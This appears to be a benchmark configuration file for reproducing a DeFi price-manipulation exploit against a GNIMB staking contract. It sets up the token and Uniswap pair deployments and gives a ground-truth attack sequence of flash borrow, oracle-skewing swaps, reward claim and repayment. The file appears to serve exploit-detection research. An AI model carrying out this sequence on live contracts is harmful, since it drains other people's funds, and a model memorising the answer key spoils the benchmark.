# Information for benchmarks building.
project_name: "NMB"

ctrt_name2cls:
  - ["nbu", "NBU"]
  - ["nimb", "NIMB"]
  - ["gnimb", "GNIMB"]
  - ["pairnbunimb", "UniswapV2Pair"]
  - ["pairnbugnimb", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["gnimbstaking", "GNIMBStaking"]

ctrt_name2deploy:
  - ["nbu", "new NBU()"]
  - ["nimb", "new NIMB()"]
  - ["gnimb", "new GNIMB()"]
  - ["pairnbunimb", ""]
  - ["pairnbugnimb", ""]
  - ["factory", ""]
  - ["router", ""]
  - [
      "gnimbstaking",
      "new GNIMBStaking(
      address(nbu),
      address(nimb),
      address(gnimb), address(router), 50)",
    ]

extra_actions:
  - "function transaction_gnimbstaking_gnimb(uint256 amount) internal {
    gnimbstaking.getReward();
    }"

extra_deployments:
  - "gnimb.transfer(address(gnimbstaking), 1500000 ether);"
  - "gnimb.transfer(attacker, 150000 ether);"
  - "attackContract.setUp(address(gnimb), address(gnimbstaking));"

extra_statements:
  - "vm.warp(block.timestamp + 8 * 24 * 60 * 60);"

attack_goal_str: "nbu"

groundtruth:
  - ["borrow", "nimb", "100000000e18"]
  - ["swap", "pairnbunimb", "nimb", "nbu", "nimb.balanceOf(attacker)"]
  - ["transaction", "gnimbstaking", "gnimb", "0"]
  - ["swap", "pairnbunimb", "nbu", "nimb", "nbu.balanceOf(attacker)"]
  - ["swap", "pairnbugnimb", "gnimb", "nbu", "gnimb.balanceOf(attacker)"]
  - ["swap", "pairnbunimb", "nbu", "nimb", "3e18"]
  - ["payback", "nimb", "100000000e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "nbu":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "nimb":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "gnimb":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "pairnbunimb":
    is_swappair: true
    uniswap_order: ["nbu", "nimb"]
    support_swaps:
      "nbu": ["nimb", "nbu"]
      "nimb": ["nimb", "nbu"]
    is_oracle: true
  "pairnbugnimb":
    is_swappair: true
    uniswap_order: ["gnimb", "nbu"]
    support_swaps:
      "nbu": ["gnimb", "nbu"]
      "gnimb": ["gnimb", "nbu"]
    is_oracle: true
  "gnimbstaking":
    is_defientry: true
    hacked_assets: ["gnimb"]

pattern: "BuySell Manipulation"
